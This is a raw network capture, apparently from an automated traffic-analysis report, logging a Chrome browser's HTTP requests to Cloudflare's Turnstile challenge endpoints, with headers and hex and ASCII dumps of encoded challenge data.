                                                                            CF-Challenge: 4ofFE0XhC0z5WAQeEBpj4WuFQFzBT9H9oSE9sMGdHfo-1734618980-1.1.1.1-ecTzc1GpiSyvKMBQSDJq8u5FYhAr.z.aa9OrhQGw8qgNf1.4w8WuwOpHiuyPMPm3
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: */*
                                                                            Origin: https://challenges.cloudflare.com
                                                                            Sec-Fetch-Site: same-origin
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g1eg9/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-19 14:36:30 UTC16384OUTData Raw: 76 5f 38 66 34 38 31 66 64 34 31 38 33 34 34 32 61 66 3d 55 39 78 74 58 54 49 4b 4d 4c 39 49 4d 25 32 62 4b 49 66 6e 34 6e 33 2b 47 49 30 6e 65 74 57 37 49 47 49 69 7a 7a 6e 78 68 37 54 4b 6e 6d 6e 74 31 37 4c 7a 49 6f 38 6e 53 37 47 71 49 51 44 35 6e 4c 42 6e 49 52 6e 78 37 65 61 54 54 38 49 6e 49 63 6e 36 73 49 6c 63 61 6e 49 61 6e 47 37 6e 6a 33 6e 2b 78 49 50 44 78 72 74 6e 62 6e 2b 4d 49 62 6e 47 56 53 37 6e 2b 74 65 7a 46 47 53 4c 47 6e 54 48 78 49 4e 71 70 52 49 5a 4c 6b 44 42 56 6b 74 53 6e 6e 73 4d 6e 4c 2d 53 2b 49 35 6e 70 37 49 6d 6e 49 4b 6e 54 2d 71 6e 68 52 61 4d 6b 71 4d 6e 76 66 68 5a 31 38 68 2d 58 78 6e 38 4c 66 68 73 42 57 58 2b 70 53 62 36 78 42 53 71 70 47 71 4b 5a 42 61 62 70 54 62 6a 79 58 35 62 54 32 39 6a 6b 33 6a 6e 44 71 34 6b
                                                                            Data Ascii: v_8f481fd4183442af=U9xtXTIKML9IM%2bKIfn4n3+GI0netW7IGIizznxh7TKnmnt17LzIo8nS7GqIQD5nLBnIRnx7eaTT8InIcn6sIlcanIanG7nj3n+xIPDxrtnbn+MIbnGVS7n+tezFGSLGnTHxINqpRIZLkDBVktSnnsMnL-S+I5np7ImnIKnT-qnhRaMkqMnvfhZ18h-Xxn8LfhsBWX+pSb6xBSqpGqKZBabpTbjyX5bT29jk3jnDq4k
                                                                            2024-12-19 14:36:30 UTC14991OUTData Raw: 4a 52 6e 61 6e 74 6a 4d 50 78 6e 50 78 6e 6e 57 59 47 78 75 6e 37 4e 44 7a 78 47 54 71 49 76 53 5a 6b 47 36 49 58 37 64 6f 75 71 53 62 6e 44 46 50 46 4f 30 53 36 6e 2b 74 49 47 6e 5a 6e 6e 54 49 4e 6e 36 37 47 4d 6e 54 6e 75 6e 54 71 6e 73 74 5a 6b 54 37 49 24 6e 5a 47 56 38 53 6b 6e 62 39 54 39 6e 51 6e 31 52 48 47 49 56 6e 44 6e 2b 35 6e 44 4d 5a 53 6e 2d 6e 76 6e 63 53 75 39 49 65 6e 71 37 75 76 6e 37 6e 7a 37 75 4e 49 6c 6e 55 37 6e 4f 49 4a 6e 70 74 6e 4b 6e 35 2b 75 68 65 6e 54 67 74 51 37 2b 73 6e 35 6e 55 48 61 38 4f 67 6e 6b 53 47 63 73 58 74 73 61 47 39 65 44 77 78 53 36 34 35 39 6e 54 74 4c 32 49 49 6e 6b 56 48 31 53 49 6e 6e 78 47 5a 42 47 39 36 35 31 47 49 76 53 55 74 47 71 54 48 73 54 53 7a 67 6e 35 6e 38 74 75 74 62 57 6e 76 31 58 4d 6e 59
                                                                            Data Ascii: JRnantjMPxnPxnnWYGxun7NDzxGTqIvSZkG6IX7douqSbnDFPFO0S6n+tIGnZnnTINn67GMnTnunTqnstZkT7I$nZGV8Sknb9T9nQn1RHGIVnDn+5nDMZSn-nvncSu9Ienq7uvn7nz7uNIlnU7nOIJnptnKn5+uhenTgtQ7+sn5nUHa8OgnkSGcsXtsaG9eDwxS6459nTtL2IInkVH1SInnxGZBG9651GIvSUtGqTHsTSzgn5n8tutbWnv1XMnY
                                                                            2024-12-19 14:36:31 UTC330INHTTP/1.1 200 OK
                                                                            Date: Thu, 19 Dec 2024 14:36:31 GMT
                                                                            Content-Type: text/plain; charset=UTF-8
                                                                            Content-Length: 26300
                                                                            Connection: close
                                                                            cf-chl-gen: PrqzEPwbCaafIh6SY/IQsIV0I+cFmRPBbfgRAEVrgIAhVb5FdlAnN6cVYkss43uNy5hUiII8tq7pzluk$lPFtdxWJQhAbLxwg
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f482015fbe8c338-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-12-19 14:36:31 UTC1039INData Raw: 58 47 32 42 66 47 68 6c 68 57 4f 55 67 4a 56 68 6b 6d 64 31 61 32 71 54 6c 6f 35 68 57 59 53 53 5a 56 6d 5a 6f 33 6c 64 61 33 56 33 66 61 71 6e 67 57 32 71 69 33 4f 6a 64 34 57 43 63 62 53 4c 76 72 53 2b 74 72 61 37 6b 72 43 32 68 4a 36 79 77 4a 76 43 77 4d 36 65 77 72 37 4a 75 36 37 45 78 73 48 4f 78 38 66 56 6c 39 54 58 32 4c 62 58 34 62 37 52 74 64 4c 6d 6f 64 4c 5a 33 36 79 66 37 38 6e 42 77 36 54 45 73 72 57 6f 34 2b 37 55 31 63 33 49 75 4d 76 64 2f 73 33 42 38 64 6a 32 78 41 51 43 43 73 66 54 33 4e 6a 33 32 2f 44 6a 2b 38 6b 47 46 65 44 4e 47 74 6e 77 37 66 44 73 32 67 7a 36 45 51 4d 6b 37 75 30 49 41 76 55 41 34 67 30 6c 47 79 33 73 34 69 66 6f 4b 67 62 78 49 79 34 6c 42 69 63 64 43 76 30 73 44 79 72 7a 44 54 77 46 50 6b 59 63 2b 6a 67 2f 48 68 6f
                                                                            Data Ascii: XG2BfGhlhWOUgJVhkmd1a2qTlo5hWYSSZVmZo3lda3V3faqngW2qi3Ojd4WCcbSLvrS+tra7krC2hJ6ywJvCwM6ewr7Ju67ExsHOx8fVl9TX2LbX4b7RtdLmodLZ36yf78nBw6TEsrWo4+7U1c3IuMvd/s3B8dj2xAQCCsfT3Nj32/Dj+8kGFeDNGtnw7fDs2gz6EQMk7u0IAvUA4g0lGy3s4ifoKgbxIy4lBicdCv0sDyrzDTwFPkYc+jg/Hho
                                                                            2024-12-19 14:36:31 UTC1369INData Raw: 50 6b 32 2b 54 6c 4a 5a 30 66 59 2b 56 6d 34 39 61 68 34 71 55 65 59 57 67 6a 48 79 64 5a 49 43 45 71 6d 69 57 73 59 31 77 69 71 69 30 63 48 6d 56 74 58 79 32 72 5a 43 45 6f 36 61 7a 78 4a 61 36 79 61 57 69 72 6f 32 6c 6d 36 79 6e 79 35 54 45 7a 36 66 4f 30 4d 32 72 77 4c 61 39 73 71 4b 76 73 37 6a 46 36 5a 2f 59 6f 37 69 6f 33 71 36 69 7a 63 2f 50 7a 4d 66 4d 39 2b 6e 4f 30 65 72 4a 36 4c 53 38 39 2f 30 43 39 74 6e 30 76 2b 4c 51 41 51 48 7a 2b 50 62 61 2f 76 6a 6d 43 76 54 67 41 4f 63 48 39 67 76 57 35 42 6e 78 36 42 45 56 37 2f 7a 73 31 76 33 59 42 51 58 2b 2f 66 50 65 49 77 41 6e 36 75 72 77 36 51 58 73 4d 53 6b 78 2b 44 73 4a 47 66 30 2f 49 53 74 41 2b 68 77 58 4d 50 6a 35 4b 67 52 49 42 78 6b 64 42 52 68 4d 4a 43 59 71 53 45 56 49 4c 30 59 55 57 44
                                                                            Data Ascii: Pk2+TlJZ0fY+Vm49ah4qUeYWgjHydZICEqmiWsY1wiqi0cHmVtXy2rZCEo6azxJa6yaWiro2lm6yny5TEz6fO0M2rwLa9sqKvs7jF6Z/Yo7io3q6izc/PzMfM9+nO0erJ6LS89/0C9tn0v+LQAQHz+Pba/vjmCvTgAOcH9gvW5Bnx6BEV7/zs1v3YBQX+/fPeIwAn6urw6QXsMSkx+DsJGf0/IStA+hwXMPj5KgRIBxkdBRhMJCYqSEVIL0YUWD
                                                                            2024-12-19 14:36:31 UTC1369INData Raw: 67 33 64 32 6d 31 32 43 6b 35 4a 32 6c 4a 65 47 61 34 69 70 6e 5a 42 2f 63 34 79 53 75 49 53 34 6d 34 39 30 6e 58 36 70 75 4a 53 5a 70 62 6d 58 70 5a 4b 39 68 4b 47 69 69 34 36 5a 75 4a 36 45 73 39 54 49 6c 71 65 6d 31 39 61 5a 6d 4a 32 58 6d 39 7a 64 75 4a 79 78 30 36 62 6a 75 38 4b 30 32 4e 2b 36 37 2b 54 52 30 75 54 69 33 76 48 57 79 66 50 30 32 39 54 32 75 50 44 52 75 50 76 37 41 2f 54 37 38 4d 58 70 39 4d 62 70 79 75 77 4c 37 76 37 4e 30 68 58 6a 30 51 67 55 38 4e 50 5a 47 4f 72 55 46 42 34 57 46 77 76 78 46 52 62 6a 2f 52 63 59 2f 50 72 72 35 65 6f 67 42 6a 41 51 4d 65 77 6f 4e 67 67 73 43 78 4d 71 4d 43 6b 64 49 42 49 4f 51 54 4d 75 48 44 44 39 4a 45 50 38 46 6a 56 4b 42 69 41 74 45 67 73 75 45 46 49 4f 4e 68 64 4f 56 68 55 54 4f 45 6b 34 56 55 41
                                                                            Data Ascii: g3d2m12Ck5J2lJeGa4ipnZB/c4ySuIS4m490nX6puJSZpbmXpZK9hKGii46ZuJ6Es9TIlqem19aZmJ2Xm9zduJyx06bju8K02N+67+TR0uTi3vHWyfP029T2uPDRuPv7A/T78MXp9MbpyuwL7v7N0hXj0QgU8NPZGOrUFB4WFwvxFRbj/RcY/Prr5eogBjAQMewoNggsCxMqMCkdIBIOQTMuHDD9JEP8FjVKBiAtEgsuEFIONhdOVhUTOEk4VUA
                                                                            2024-12-19 14:36:31 UTC1369INData Raw: 61 65 57 6d 36 47 41 6d 34 6d 4d 61 70 35 39 6f 71 79 69 74 34 79 46 70 61 74 30 63 4b 71 5a 74 37 6d 74 6a 62 2b 6a 76 61 6c 2f 71 72 37 43 72 72 36 66 68 36 4b 36 78 73 36 4f 31 74 47 76 77 64 65 71 30 70 79 51 32 4a 79 68 77 63 54 58 6f 37 66 48 30 4c 50 70 36 63 65 36 37 62 66 48 76 2b 44 77 72 4f 33 76 78 37 58 69 32 75 7a 6c 2b 4f 62 2b 34 4e 6e 79 75 63 54 55 2b 67 58 55 39 38 49 49 36 4f 48 6f 37 67 6e 68 37 77 48 65 46 38 77 4f 31 68 54 58 46 77 7a 6c 46 68 4d 52 48 64 77 5a 2f 64 38 43 2b 52 77 71 47 41 63 63 35 67 77 68 37 75 72 70 41 69 76 72 4e 52 63 4a 4c 50 59 49 38 67 66 35 39 77 76 7a 51 6a 67 42 4c 2f 34 6c 41 30 68 4c 47 78 63 76 52 43 6f 74 4f 79 45 51 4a 7a 51 70 4d 53 55 72 56 69 77 7a 55 43 74 54 50 78 51 33 54 42 63 2b 4e 68 6f 33
                                                                            Data Ascii: aeWm6GAm4mMap59oqyit4yFpat0cKqZt7mtjb+jval/qr7Crr6fh6K6xs6O1tGvwdeq0pyQ2JyhwcTXo7fH0LPp6ce67bfHv+DwrO3vx7Xi2uzl+Ob+4NnyucTU+gXU98II6OHo7gnh7wHeF8wO1hTXFwzlFhMRHdwZ/d8C+RwqGAcc5gwh7urpAivrNRcJLPYI8gf59wvzQjgBL/4lA0hLGxcvRCotOyEQJzQpMSUrViwzUCtTPxQ3TBc+Nho3
                                                                            2024-12-19 14:36:31 UTC1369INData Raw: 32 41 67 6f 35 2b 5a 36 53 41 70 72 65 71 64 36 53 35 6b 72 79 53 75 73 4b 59 6a 33 35 2b 6c 4c 71 6c 67 37 61 34 71 59 62 4f 76 72 43 4c 70 4d 61 39 79 6f 33 59 74 62 72 4f 32 4e 36 34 6d 4e 2f 62 74 64 54 54 76 74 4b 36 6e 72 2f 53 31 63 43 6a 70 4e 6e 4b 38 63 44 68 78 75 7a 72 78 2f 62 5a 73 38 37 75 36 62 6e 76 38 76 44 64 76 75 58 78 76 50 48 35 34 77 77 43 79 2b 77 44 7a 51 4d 52 79 66 7a 7a 7a 75 72 55 47 52 59 56 39 76 41 64 38 39 6e 73 49 2f 55 67 34 53 49 67 46 43 59 6a 41 50 58 6e 35 69 6f 50 2b 75 30 49 4d 52 41 33 4d 50 55 68 38 7a 59 4c 46 2f 63 53 2f 53 77 2f 46 6a 6a 2b 52 54 44 35 53 6b 50 38 48 7a 39 4e 4a 53 59 4a 44 43 6b 7a 52 46 63 74 4e 7a 70 55 47 53 63 7a 57 78 39 5a 53 57 42 66 4d 31 67 68 4f 52 6f 62 4a 47 4d 70 61 57 6c 6f 51
                                                                            Data Ascii: 2Ago5+Z6SApreqd6S5krySusKYj35+lLqlg7a4qYbOvrCLpMa9yo3YtbrO2N64mN/btdTTvtK6nr/S1cCjpNnK8cDhxuzrx/bZs87u6bnv8vDdvuXxvPH54wwCy+wDzQMRyfzzzurUGRYV9vAd89nsI/Ug4SIgFCYjAPXn5ioP+u0IMRA3MPUh8zYLF/cS/Sw/Fjj+RTD5SkP8Hz9NJSYJDCkzRFctNzpUGSczWx9ZSWBfM1ghORobJGMpaWloQ
                                                                            2024-12-19 14:36:31 UTC1369INData Raw: 58 72 70 52 78 72 71 79 65 6d 37 32 7a 6f 4a 36 32 74 71 61 33 74 72 6d 6e 76 4c 32 48 72 70 75 50 76 4b 47 4b 70 38 53 68 73 4b 75 71 6f 37 4c 5a 75 37 6e 64 6c 73 75 72 75 74 32 37 73 65 58 45 77 37 61 32 6f 74 71 36 33 74 37 48 79 39 44 45 35 39 54 41 31 4f 50 54 32 4e 54 77 30 38 7a 55 36 4e 76 64 38 76 62 6b 76 73 4c 35 35 51 72 6e 36 64 6a 72 2b 65 4c 64 41 51 59 49 34 41 62 72 43 65 58 30 38 50 48 74 35 77 41 58 2f 4e 6b 58 46 51 63 45 4a 68 77 4a 42 78 38 66 44 79 41 66 49 68 41 6c 4a 75 38 58 42 50 63 6c 43 6a 6b 75 44 67 6e 32 4b 78 77 50 48 43 41 58 45 43 45 6b 47 52 51 6c 48 45 49 70 4b 52 67 76 4a 42 38 55 4a 6a 5a 4c 4e 55 4d 72 4f 42 51 75 50 79 31 41 48 45 49 62 57 7a 59 38 4e 55 46 57 53 56 74 41 50 7a 68 49 52 56 42 4f 63 6c 42 53 51 56
                                                                            Data Ascii: XrpRxrqyem72zoJ62tqa3trmnvL2HrpuPvKGKp8ShsKuqo7LZu7ndlsurut27seXEw7a2otq63t7Hy9DE59TA1OPT2NTw08zU6Nvd8vbkvsL55Qrn6djr+eLdAQYI4AbrCeX08PHt5wAX/NkXFQcEJhwJBx8fDyAfIhAlJu8XBPclCjkuDgn2KxwPHCAXECEkGRQlHEIpKRgvJB8UJjZLNUMrOBQuPy1AHEIbWzY8NUFWSVtAPzhIRVBOclBSQV
                                                                            2024-12-19 14:36:31 UTC1369INData Raw: 72 71 6d 53 6a 4a 75 54 6d 6f 2b 31 6d 35 69 55 6b 73 57 66 6e 73 7a 46 71 70 33 51 69 71 6d 67 72 73 32 72 70 4d 6a 52 30 61 65 32 31 62 53 73 71 74 32 31 73 4c 37 56 76 72 50 71 31 62 32 34 37 4b 72 46 76 65 43 75 79 62 2f 30 35 63 7a 4b 2b 4f 33 51 78 38 62 35 31 38 30 42 76 74 37 50 33 76 33 39 30 2b 50 66 33 64 63 4e 2f 65 50 62 36 74 4c 6d 33 77 63 43 36 4f 50 79 31 76 62 6f 35 67 37 7a 37 53 45 65 39 2f 59 6c 46 76 6a 30 4b 65 59 42 2b 41 66 75 42 66 7a 36 4b 69 6f 41 2f 76 49 4c 42 52 4d 32 45 67 6b 75 46 42 4d 4e 44 53 34 56 45 52 39 43 48 42 51 54 42 78 34 61 54 55 6f 6f 49 31 45 54 4b 43 4a 46 46 79 38 6c 49 31 49 33 4b 46 34 77 56 69 77 37 59 6a 73 78 5a 56 6f 35 4e 44 4d 72 52 44 39 74 4c 30 45 38 63 57 5a 47 51 54 39 32 53 55 56 37 5a 6c 4e
                                                                            Data Ascii: rqmSjJuTmo+1m5iUksWfnszFqp3Qiqmgrs2rpMjR0ae21bSsqt21sL7VvrPq1b247KrFveCuyb/05czK+O3Qx8b5180Bvt7P3v390+Pf3dcN/ePb6tLm3wcC6OPy1vbo5g7z7SEe9/YlFvj0KeYB+AfuBfz6KioA/vILBRM2EgkuFBMNDS4VER9CHBQTBx4aTUooI1ETKCJFFy8lI1I3KF4wViw7YjsxZVo5NDMrRD9tL0E8cWZGQT92SUV7ZlN
                                                                            2024-12-19 14:36:31 UTC1369INData Raw: 5a 75 68 6a 34 69 65 75 70 76 42 70 4d 2b 58 6b 4b 62 43 6f 38 6d 75 72 37 65 58 71 70 47 33 75 72 65 6f 74 4b 32 79 34 4e 58 55 75 73 4c 56 32 63 4c 45 31 62 36 33 75 4c 2b 6f 79 37 7a 49 77 63 62 30 36 63 6e 4a 36 75 58 31 79 76 44 78 38 64 72 63 37 73 37 55 34 74 76 41 32 63 48 66 39 2b 54 5a 37 4e 72 67 37 52 49 46 35 51 63 44 35 65 59 4e 2b 78 4c 32 44 67 48 76 38 74 6b 4f 41 2f 33 77 45 2f 44 32 48 52 34 65 42 67 6b 62 2f 41 49 6a 48 2f 30 44 4b 51 67 75 45 69 6f 64 43 41 2f 31 46 42 38 5a 44 53 34 45 45 7a 6b 36 4f 69 4d 56 4e 6b 59 65 51 6a 41 4d 4a 68 74 4f 44 69 4e 4a 53 6b 6f 78 4a 55 59 59 4d 69 64 61 47 6a 4a 54 54 69 41 36 4c 31 34 69 4e 31 31 65 58 6b 5a 76 57 69 78 47 4f 32 6f 75 52 6d 64 69 4e 45 35 44 62 6a 5a 4c 63 58 4a 79 57 6e 4e 75
                                                                            Data Ascii: Zuhj4ieupvBpM+XkKbCo8mur7eXqpG3ureotK2y4NXUusLV2cLE1b63uL+oy7zIwcb06cnJ6uX1yvDx8drc7s7U4tvA2cHf9+TZ7Nrg7RIF5QcD5eYN+xL2DgHv8tkOA/3wE/D2HR4eBgkb/AIjH/0DKQguEiodCA/1FB8ZDS4EEzk6OiMVNkYeQjAMJhtODiNJSkoxJUYYMidaGjJTTiA6L14iN11eXkZvWixGO2ouRmdiNE5DbjZLcXJyWnNu


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            22192.168.2.1749743104.18.94.414436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:36:32 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1775978109:1734617617:EyZoP9ZsFKkpBu9bVNo10nyFoZAd8OdM8YsSiTAyQxg/8f481fd4183442af/4ofFE0XhC0z5WAQeEBpj4WuFQFzBT9H9oSE9sMGdHfo-1734618980-1.1.1.1-ecTzc1GpiSyvKMBQSDJq8u5FYhAr.z.aa9OrhQGw8qgNf1.4w8WuwOpHiuyPMPm3 HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-19 14:36:33 UTC379INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 19 Dec 2024 14:36:33 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 7
                                                                            Connection: close
                                                                            cf-chl-out: uSXDzmaePtOnGNrKFWA5tjhWhiB/H+y4uww=$UrAu0um6ELqEL9Ik
                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f482023780442a3-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-12-19 14:36:33 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                            Data Ascii: invalid


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            23192.168.2.1749751104.18.94.414436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:37:38 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1775978109:1734617617:EyZoP9ZsFKkpBu9bVNo10nyFoZAd8OdM8YsSiTAyQxg/8f481fd4183442af/4ofFE0XhC0z5WAQeEBpj4WuFQFzBT9H9oSE9sMGdHfo-1734618980-1.1.1.1-ecTzc1GpiSyvKMBQSDJq8u5FYhAr.z.aa9OrhQGw8qgNf1.4w8WuwOpHiuyPMPm3 HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            Content-Length: 33754
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            Content-type: application/x-www-form-urlencoded
                                                                            CF-Chl-RetryAttempt: 0
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            CF-Challenge: 4ofFE0XhC0z5WAQeEBpj4WuFQFzBT9H9oSE9sMGdHfo-1734618980-1.1.1.1-ecTzc1GpiSyvKMBQSDJq8u5FYhAr.z.aa9OrhQGw8qgNf1.4w8WuwOpHiuyPMPm3
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: */*
                                                                            Origin: https://challenges.cloudflare.com
                                                                            Sec-Fetch-Site: same-origin
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g1eg9/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-19 14:37:38 UTC16384OUTData Raw: 76 5f 38 66 34 38 31 66 64 34 31 38 33 34 34 32 61 66 3d 55 39 78 74 58 54 49 4b 4d 4c 39 49 4d 25 32 62 4b 49 66 6e 34 6e 33 2b 47 49 30 6e 65 74 57 37 49 47 49 69 7a 7a 6e 78 68 37 54 4b 6e 6d 6e 74 31 37 4c 7a 49 6f 38 6e 53 37 47 71 49 51 44 35 6e 4c 42 6e 49 52 6e 78 37 65 61 54 54 38 49 6e 49 63 6e 36 73 49 6c 63 61 6e 49 61 6e 47 37 6e 6a 33 6e 2b 78 49 50 44 78 72 74 6e 62 6e 2b 4d 49 62 6e 47 56 53 37 6e 2b 74 65 7a 46 47 53 4c 47 6e 54 48 78 49 4e 71 70 52 49 5a 4c 6b 44 42 56 6b 74 53 6e 6e 73 4d 6e 4c 2d 53 2b 49 35 6e 70 37 49 6d 6e 49 4b 6e 54 2d 71 6e 68 52 61 4d 6b 71 4d 6e 76 66 68 5a 31 38 68 2d 58 78 6e 38 4c 66 68 73 42 57 58 2b 70 53 62 36 78 42 53 71 70 47 71 4b 5a 42 61 62 70 54 62 6a 79 58 35 62 54 32 39 6a 6b 33 6a 6e 44 71 34 6b
                                                                            Data Ascii: v_8f481fd4183442af=U9xtXTIKML9IM%2bKIfn4n3+GI0netW7IGIizznxh7TKnmnt17LzIo8nS7GqIQD5nLBnIRnx7eaTT8InIcn6sIlcanIanG7nj3n+xIPDxrtnbn+MIbnGVS7n+tezFGSLGnTHxINqpRIZLkDBVktSnnsMnL-S+I5np7ImnIKnT-qnhRaMkqMnvfhZ18h-Xxn8LfhsBWX+pSb6xBSqpGqKZBabpTbjyX5bT29jk3jnDq4k
                                                                            2024-12-19 14:37:38 UTC16384OUTData Raw: 4a 52 6e 61 6e 74 6a 4d 50 78 6e 50 78 6e 6e 57 59 47 78 75 6e 37 4e 44 7a 78 47 54 71 49 76 53 5a 6b 47 36 49 58 37 64 6f 75 71 53 62 6e 44 46 50 46 4f 30 53 36 6e 2b 74 49 47 6e 5a 6e 6e 54 49 4e 6e 36 37 47 4d 6e 54 6e 75 6e 54 71 6e 73 74 5a 6b 54 37 49 24 6e 5a 47 56 38 53 6b 6e 62 39 54 39 6e 51 6e 31 52 48 47 49 56 6e 44 6e 2b 35 6e 44 4d 5a 53 6e 2d 6e 76 6e 63 53 75 39 49 65 6e 71 37 75 76 6e 37 6e 7a 37 75 4e 49 6c 6e 55 37 6e 4f 49 4a 6e 70 74 6e 4b 6e 35 2b 75 68 65 6e 54 67 74 51 37 2b 73 6e 35 6e 55 48 61 38 4f 67 6e 6b 53 47 63 73 58 74 73 61 47 39 65 44 77 78 53 36 34 35 39 6e 54 74 4c 32 49 49 6e 6b 56 48 31 53 49 6e 6e 78 47 5a 42 47 39 36 35 31 47 49 76 53 55 74 47 71 54 48 73 54 53 7a 67 6e 35 6e 38 74 75 74 62 57 6e 76 31 58 4d 6e 59
                                                                            Data Ascii: JRnantjMPxnPxnnWYGxun7NDzxGTqIvSZkG6IX7douqSbnDFPFO0S6n+tIGnZnnTINn67GMnTnunTqnstZkT7I$nZGV8Sknb9T9nQn1RHGIVnDn+5nDMZSn-nvncSu9Ienq7uvn7nz7uNIlnU7nOIJnptnKn5+uhenTgtQ7+sn5nUHa8OgnkSGcsXtsaG9eDwxS6459nTtL2IInkVH1SInnxGZBG9651GIvSUtGqTHsTSzgn5n8tutbWnv1XMnY
                                                                            2024-12-19 14:37:38 UTC986OUTData Raw: 73 66 53 72 53 6e 75 6e 64 46 50 6a 54 54 6e 79 6e 6f 48 73 76 78 53 6f 36 74 65 59 2d 53 4d 49 37 6e 65 39 61 77 74 24 68 49 44 6d 6e 49 54 49 2d 72 75 76 79 4b 49 4d 74 43 30 2d 43 43 32 64 57 30 41 43 43 46 64 78 74 47 65 43 74 46 79 50 69 65 4f 49 4f 57 2d 59 6d 54 6e 74 79 4d 7a 52 49 6e 74 56 37 65 54 54 33 35 4d 53 49 7a 75 24 74 30 49 34 7a 6e 71 43 41 41 6b 5a 57 53 46 7a 78 78 49 65 75 53 69 2d 70 48 43 6c 53 50 24 6d 49 54 49 64 51 73 70 55 4f 30 58 68 78 4c 37 4d 73 6e 66 30 50 56 65 69 74 38 6e 65 35 6e 54 53 6d 4e 71 39 6e 6a 73 73 42 49 38 6e 69 39 49 66 47 7a 54 56 73 46 39 7a 64 58 4b 36 62 4a 63 47 2d 30 39 59 44 47 46 58 32 39 42 6e 2b 46 58 46 39 37 49 70 6e 44 66 6e 71 49 63 6e 44 78 47 43 75 49 74 68 39 47 42 49 36 53 68 71 47 32 4f
                                                                            Data Ascii: sfSrSnundFPjTTnynoHsvxSo6teY-SMI7ne9awt$hIDmnITI-ruvyKIMtC0-CC2dW0ACCFdxtGeCtFyPieOIOW-YmTntyMzRIntV7eTT35MSIzu$t0I4znqCAAkZWSFzxxIeuSi-pHClSP$mITIdQspUO0XhxL7Msnf0PVeit8ne5nTSmNq9njssBI8ni9IfGzTVsF9zdXK6bJcG-09YDGFX29Bn+FXF97IpnDfnqIcnDxGCuIth9GBI6ShqG2O
                                                                            2024-12-19 14:37:38 UTC286INHTTP/1.1 200 OK
                                                                            Date: Thu, 19 Dec 2024 14:37:38 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Content-Length: 4544
                                                                            Connection: close
                                                                            cf-chl-out: 1apa0w9gXKVJU/BYVC2Mi2P57FIheOtJInnMq+Cn2bPk4v2IDPgaM7t0oE4nmy+AKWMvbq9+0p6CeFUb2d6rN/oY9QjE4Md6xYagjvBDe+Is6cTxP6D9vQ8=$QXEHsNDl74dzF60H
                                                                            2024-12-19 14:37:38 UTC1259INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 47 54 48 2f 6c 65 49 67 6b 4e 76 52 58 58 62 74 38 74 67 41 71 4d 74 68 56 47 58 5a 57 59 34 49 55 78 39 4f 36 6e 69 56 31 50 33 47 59 43 57 36 48 79 73 44 2b 38 44 6b 52 44 57 76 77 71 44 6e 4f 69 51 77 6f 39 53 4d 43 4f 45 4b 50 45 4d 4c 54 6c 53 4f 56 4c 2b 50 68 6c 4f 42 53 4a 63 34 74 32 57 69 2b 4a 45 69 67 63 70 7a 55 35 58 6e 6e 5a 6c 43 50 53 78 6d 4b 34 35 4b 57 6e 48 68 68 33 66 61 62 75 63 53 30 55 39 50 69 49 70 67 70 4f 53 52 6f 37 50 74 70 58 6c 61 61 34 5a 4b 65 46 58 71 48 73 74 57 75 42 61 48 4d 43 53 34 53 51 55 4d 32 31 39 4e 63 71 43 38 76 37 6f 6a 64 6c 64 77 71 6f 65 33 48 78 77 43 6b 68 61 6f 6b 30 52 34 57 61 4f 2b 6e 37 56 73 35 65 4a 2f 2b 69 2f 37 5a 61 58 4e 71 64 67 6a 71 41 6d 71 6d
